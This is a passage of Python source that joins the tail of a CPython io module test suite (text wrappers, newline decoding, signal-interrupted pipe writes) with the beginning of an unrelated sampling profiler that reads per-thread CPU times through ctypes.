with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise IOError()
txt.flush = bad_flush
self.assertRaises(IOError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises((AttributeError, TypeError)):
txt.buffer = buf
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
class NonbytesStream(self.StringIO):
read1 = self.StringIO.read
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.read(1)
t = self.TextIOWrapper(NonbytesStream('a'))
with self.maybeRaises(TypeError):
t.readline()
t = self.TextIOWrapper(NonbytesStream('a'))
self.assertEqual(t.read(), u'a')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri_codec")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri_codec")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read(1)
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.readline()
with support.check_py3k_warnings():
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'), newline='\n',
encoding='quopri_codec')
with self.maybeRaises(TypeError):
t.read()
#else:
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read, 1)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.readline)
#t = _make_illegal_wrapper()
#self.assertRaises(TypeError, t.read)
class CTextIOWrapperTest(TextIOWrapperTest):
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
maybeRaises = unittest.TestCase.assertRaises
class PyTextIOWrapperTest(TextIOWrapperTest):
@contextlib.contextmanager
def maybeRaises(self, *args, **kwds):
yield
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(b))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(unicode):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
class PyMiscIOTest(MiscIOTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1 // 0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
try:
with self.assertRaises(ZeroDivisionError):
wio.write(item * (support.PIPE_MAX_SIZE // len(item) + 1))
finally:
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1//0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupterd_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupterd_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = [None]
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
error[0] = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error[0])
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupterd_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupterd_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = dict((name, getattr(io, name)) for name in all_members)
py_io_ns = dict((name, getattr(pyio, name)) for name in all_members)
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
newprofiler.py | # Python Profiler v3
# Copyright (c) 2015-2017 David R Walker
# TODO:
# [x] Record only functions in StackLines
# [ ] Handle per-line hotspots as separate structure (not nested) - ?
# [ ] Handle timeline as separate structure
# [x] Use unique stack IDs to dedupe stack tuples
# [ ] Merge profile data method
# [ ] add custom metadata values to profile data (e.g. url, op, user id) for filtering / grouping
# [ ] filter/merge profile data by metadata
# [x] Expose randomize parameter for stochastic sampling
# [x] Add rate control (remove interval)
# - is this more or less misleading if we don't adjust for profiler overhead to achieve rate?
# - not adjusting for drift might be handy for estimating profiler performance/overheads
# [x] Finish linux platform driver (get thread CPU times seems to be unfinished!!)
# [ ] Windows platform driver
# [ ] Tidy up platform drivers and make a nice platform choosing function
# [ ] Convert into proper Python module + split into submodules
# [ ] Basic (temp) dump function (flat) - replace with proper collated version from stack tree
# [ ] Filter out long tail option (collate items with low ticks as 'Other') to remove noise
# [ ] Post process to build stack/call graph (have exporters work from this graph instead of raw data) - ?
# [ ] Record process ID in addition to thread?
# [ ] Option to merge processes
# [ ] Option to merge threads
# [ ] Test performance / optimize on various platforms
# [ ] Serialize (+append?) to file (lock file?)
# [ ] Load from file
# [ ] HTML5 exporter with drill-down
# [ ] Import/exporter framework
# [ ] Export to standard profiler formats (e.g. python, callgrind, firefox ThreadProfile json)
# [ ] Make Python 3 compatible
# [ ] Decorator to wrap a function with profiler
# [ ] Function to watch a function in profiler? (e.g. store code object in dict and check)
# [ ] Option to filter out standard (and custom) libraries? (path prefixes?)
# [ ] Figure out how to play nicely with time.sleep(), etc. - do we need to patch it?
# - EINTR / silent signal interrupts
# - breaks sleep/timeout behaviour in programs - provide optional monkey patches?
# - or just accept that signals break waits, and is fixed eventually by PEP475
# ('serious' code should be handling EINTR anyway?)
# [ ] Figure out how to avoid having to patch thread, wherever possible
# - maybe spawn a test thread on module import to detect if thread IDs match ?
# [x] Make interval private on profiler (or don't store)
# [x] Move all running time stats etc. into _profile_data - already done
import os
import time
import random
from contextlib import contextmanager
# - Scheduler ------------------------------------------------------------------
# Base class for repeated periodic function call
class IntervalScheduler(object):
default_rate = 1
def __init__(self, interval_func, interval=0.01, stochastic=False, func_args=(), func_kwargs={}):
self.interval = interval
self._random = None
if stochastic:
# Our own Random to avoid side effects on shared PRNG
self._random = random.Random()
self._running = False
self._interval_func = interval_func
self._func_args = func_args
self._func_kwargs = func_kwargs
self._init()
def start(self):
if not self.is_running():
self._start()
self._running = True
def stop(self):
if self.is_running():
self._stop()
self._running = False
def is_running(self):
return self._running
def get_next_interval(self):
if self._random:
return (2.0 * self._random.random() * self.interval)
else:
return self.interval
def tick(self, frame):
self._interval_func(*self._func_args, _interrupted_frame=frame, **self._func_kwargs)
# Sub-classes should override the following methods to implement a scheduler
# that will call self.tick() every self.interval seconds.
# If the scheduler interupts a Python frame, it should pass the frame that was
# interrupted to tick(), otherwise it should pass in None.
def _init(self):
pass
def _start(self):
raise NotImplementedError()
def _stop(self):
raise NotImplementedError()
# Uses a separate sleeping thread, which wakes periodically and calls self.tick()
class ThreadIntervalScheduler(IntervalScheduler):
default_rate = 100
def _init(self):
import threading
self._thread = None
self._stopping = False
self._event = threading.Event()
def _start(self):
import threading
self._event.clear()
def thread_func():
while not self._event.is_set():
self._event.wait(timeout=self.get_next_interval())
self.tick(None)
self._thread = threading.Thread(target=thread_func, name='profiler')
self._thread.daemon = True
self._thread.start()
def _stop(self):
self._event.set()
self._thread.join()
self._stopping = False
import signal
# Signals the main thread every interval, which calls the tick() method when
# the timer event is triggered.
# Note that signal handlers are blocked during system calls, library calls, etc.
# in the main thread.
# We compensate for this by keeping track of real, user cpu, and system cpu
# usage between ticks on each thread.
# We prefer ITIMER_REAL, because that will be triggered immediately upon
# returning from a long-blocking system call, so we can add the ticks to the
# most appropriate function.
# However, if the main thread is blocked for a significant period, this will
# reduce the accuracy of samples in other threads, because only the main
# thread handles signals. In such situations, the ThreadIntervalScheduler might
# be more accurate.
# We don't specify an interval and reschedule the next tick ourselves. This
# allows us to dynamically change the sample interval to avoid aliasing, and
# prevents the signal interrupting itself, which can lead to stack errors,
# some strange behaviour when threads are being join()ed, and polluting the
# profile data with stack data from the profiler.
class SignalIntervalScheduler(IntervalScheduler):
default_rate = 1000
timer = signal.ITIMER_REAL
signal = signal.SIGALRM
def _start(self):
def signal_handler(signum, frame):
self.tick(frame)
if self._run:
signal.setitimer(self.timer, self.get_next_interval(), 0)
signal.signal(self.signal, signal_handler)
signal.siginterrupt(self.signal, False)
self._run = True
signal.setitimer(self.timer, self.get_next_interval(), 0)
def _stop(self):
self._run = False
signal.setitimer(self.timer, 0, 0)
# - Platform-specific stuff ----------------------------------------------------
import thread
import threading
class ThreadPlatform(object):
def __init__(self):
self.name = ''
self.lock = threading.Lock()
self._registered_threads = {}
self._original_start_new_thread = thread.start_new_thread
self.platform_init()
def _patch_thread(self):
assert threading.current_thread().name == 'MainThread'
with self.lock:
self._registered_threads[threading.current_thread().ident] = self.get_current_thread_id()
def start_new_thread_wrapper(func, args, kwargs={}):
def thread_func(func, args, kwargs):
system_tid = self.get_current_thread_id()
with self.lock:
self._registered_threads[threading.current_thread().ident] = system_tid
return func(*args, **kwargs)
return self._original_start_new_thread(thread_func, (func, args, kwargs))
thread.start_new_thread = start_new_thread_wrapper
threading._start_new_thread = start_new_thread_wrapper
def _unpatch_thread(self):
with self.lock:
self._registered_threads = {}
thread.start_new_thread = _original_start_new_thread
threading._start_new_thread = _original_start_new_thread
def _get_patched_thread_id(self, python_ident):
#with self.lock:
return self._registered_threads.get(python_ident)
def platform_init(self):
raise NotImplementedError()
def get_thread_id_from_python_ident(self, python_ident):
raise NotImplementedError()
def get_current_thread_id(self):
raise NotImplementedError()
def get_thread_cpu_time(self, thread_id=None):
raise NotImplementedError()
# Single-threaded CPU times using os.times(),
# which actually gives CPU times for the whole
# process.
# Will give bad results if there are actually
# other threads running!
class SingleThreadedPlatform(ThreadPlatform):
def platform_init(self):
pass
def get_thread_id_from_python_ident(self):
return 0
def get_current_thread_id(self):
return 0
def get_thread_cpu_time(self, thread_id=None):
time_info = os.times()
return time_info[0] + time_info[1]
class MacPThreadPlatform(ThreadPlatform):
def platform_init(self):
import ctypes
import ctypes.util
libc = ctypes.CDLL(ctypes.util.find_library('libc'))
self._mach_thread_self = libc.mach_thread_self
self._mach_thread_self.restype = ctypes.c_uint
# TODO: check these field definitions
class time_value_t(ctypes.Structure):
_fields_ = [
("seconds", ctypes.c_int),
("microseconds",ctypes.c_int)
]
class thread_basic_info(ctypes.Structure):
_fields_ = [
("user_time", time_value_t),
("system_time",time_value_t),
("cpu_usage",ctypes.c_int),
("policy",ctypes.c_int),
("run_state",ctypes.c_int),
("flags",ctypes.c_int),
("suspend_count",ctypes.c_int),
("sleep_time",ctypes.c_int)
]
thread_info = libc.thread_info
thread_info.restype = ctypes.c_int
thread_info.argtypes = [
ctypes.c_uint,
ctypes.c_int,
ctypes.POINTER(thread_basic_info),
ctypes.POINTER(ctypes.c_uint)
]
self._thread_info = thread_info
self._THREAD_BASIC_INFO = 3
self._out_info = thread_basic_info()
self._count = ctypes.c_uint(ctypes.sizeof(self._out_info) / ctypes.sizeof(ctypes.c_uint))
self._patch_thread()
def get_thread_id_from_python_ident(self, python_ident):
return self._get_patched_thread_id(python_ident)
def get_current_thread_id(self):
return self._mach_thread_self()
def get_thread_cpu_time(self, python_ident=None):
import ctypes
# TODO: Optimize with shared structs, sizes, to minimize allocs per tick
if python_ident is None:
thread_id = self.get_current_thread_id()
else:
thread_id = self.get_thread_id_from_python_ident(python_ident)
out_info = self._out_info
result = self._thread_info(
thread_id,
self._THREAD_BASIC_INFO,
ctypes.byref(out_info),
ctypes.byref(self._count),
)
if result != 0:
return 0.0
user_time = out_info.user_time.seconds + out_info.user_time.microseconds / 1000000.0
system_time = out_info.system_time.seconds + out_info.system_time.microseconds / 1000000.0
return user_time + system_time
class LinuxPThreadPlatform(ThreadPlatform):
def platform_init(self):
import ctypes
import ctypes.util
pthread = ctypes.CDLL(ctypes.util.find_library('pthread'))
libc = ctypes.CDLL(ctypes.util.find_library('c'))
pthread_t = ctypes.c_ulong
clockid_t = ctypes.c_long
time_t = ctypes.c_long
NANOSEC = 1.0 / 1e9
CLOCK_THREAD_CPUTIME_ID = 3 # from linux/time.h
class timespec(ctypes.Structure):
_fields_ = [
('tv_sec', time_t),
('tv_nsec', ctypes.c_long),
]
# wrap pthread_self()
pthread_self = pthread.pthread_self
pthread.argtypes = []
pthread_self.restype = pthread_t
# wrap pthread_getcpuclockid()
pthread_getcpuclockid = pthread.pthread_getcpuclockid
pthread_getcpuclockid.argtypes = [pthread_t, ctypes.POINTER(clockid_t)]
